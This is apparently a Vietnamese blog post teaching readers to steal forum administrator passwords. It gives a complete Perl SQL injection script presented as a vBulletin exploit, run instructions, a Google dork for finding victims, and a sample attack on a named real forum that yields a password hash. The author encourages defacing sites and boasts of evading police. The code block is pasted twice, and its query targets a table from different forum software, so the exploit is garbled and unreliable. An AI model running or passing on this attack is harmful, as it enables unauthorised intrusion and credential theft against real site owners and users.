Các bạn đã bao giờ muốn làm Admin của website nào đó chưa !!! hãy thử cảm giác nhé ... có thể phá hủy hay thay đổi giao diện của website cơ đó ... mình sẽ không chịu trách nhiệm của vụ này nhé ... các bạn học hỏi và làm thì kệ ... khi bị gì thì không nói là do mình nhé ... ít thì ngồi tù 1 năm còn hack web của GD-DT thì cũng phải 3 năm tù... mình có cách để an ninh mạng không phát hiện đó là mình ... nhưng mình sẽ ko chỉ đâu lơ các bạn làm tặc thì chết !!!
1:- Google tìm và Download Active Perl và Install
3:- Nở notepad và dán đoạn code sau:
#!/usr/bin/perl
use IO::Socket;
print q{
################################################## #####################
#vBulletin? Version 4.0.1 Remote SQL Injection Exploit
#By JAR
# our Site www.xayda.info
# Dork: Powered by vBulletin? Version 4.0.1
################################################## #####################
};
if (!$ARGV[2]) {
print q{
Usage: perl VB4.0.1.pl host /directory/ victim_userid
perl VB4.0.1.pl www.vb.com /forum/ 1
};
}
$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ?,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ;
print "[~] PREPARE TO CONNECT...\r\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";
print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";
print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "Password is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";
}
exit();
}
}
print "------------------------------------------------------------------------------------------------\r\n";
Sao chép mã
4:- Lưu lại ở ổ C với tên "name.pl", ở File type chọn All Type.
5:- Vào Start -> Run -> CMD và chạy file name.pl đó.
6:- Gõ enter để thực hiện lệnh.
7:- Và file của bạn được thấy giống như:
C:\name.pl"
8:- Vào Google Search với từ khóa: " Powered by vBulletin? Version 4.0.5" (Đã test trên 4.0.5 vẫn được)
9:- Chọn Forum muốn Hack pass
10: Ví dụ: http://www.webketoan.vn/forum
11: Vào CMD và gõ:
C:\>name.pl www.webketoan.vn /forum/ 1
Kết quả:
[>] SERVER: www.webketoan.vn
[>] DIR: /forum/
[>] USERID: 1
------------------------------------------------
----------------
[~] PREPARE TO CONNECT...
[+] CONNECTED
[~] SENDING QUERY...
[+] DONE!
--[ REPORT ]------------------------------------
----------------
Password is: f3d5c6d110ddda08ef207d1ecb3b79ae
------------------------------------------------
Xong rùi kiếm soft giải mã cái này ra là xong, vì nó chứa thêm vài kí tự ngẫu nhiên :)
use IO::Socket;
print q{
################################################## #####################
#vBulletin? Version 4.0.1 Remote SQL Injection Exploit
#By JAR
# our Site www.xayda.info
# Dork: Powered by vBulletin? Version 4.0.1
################################################## #####################
};
if (!$ARGV[2]) {
print q{
Usage: perl VB4.0.1.pl host /directory/ victim_userid
perl VB4.0.1.pl www.vb.com /forum/ 1
};
}
$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ?,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ;
print "[~] PREPARE TO CONNECT...\r\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";
print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";
print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "Password is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";
}
exit();
}
}
print "------------------------------------------------------------------------------------------------\r\n";
Sao chép mã
4:- Lưu lại ở ổ C với tên "name.pl", ở File type chọn All Type.
5:- Vào Start -> Run -> CMD và chạy file name.pl đó.
6:- Gõ enter để thực hiện lệnh.
7:- Và file của bạn được thấy giống như:
C:\name.pl"
8:- Vào Google Search với từ khóa: " Powered by vBulletin? Version 4.0.5" (Đã test trên 4.0.5 vẫn được)
9:- Chọn Forum muốn Hack pass
10: Ví dụ: http://www.webketoan.vn/forum
11: Vào CMD và gõ:
C:\>name.pl www.webketoan.vn /forum/ 1
Kết quả:
[>] SERVER: www.webketoan.vn
[>] DIR: /forum/
[>] USERID: 1
------------------------------------------------
----------------
[~] PREPARE TO CONNECT...
[+] CONNECTED
[~] SENDING QUERY...
[+] DONE!
--[ REPORT ]------------------------------------
----------------
Password is: f3d5c6d110ddda08ef207d1ecb3b79ae
------------------------------------------------
Xong rùi kiếm soft giải mã cái này ra là xong, vì nó chứa thêm vài kí tự ngẫu nhiên :)






Không có nhận xét nào:
Đăng nhận xét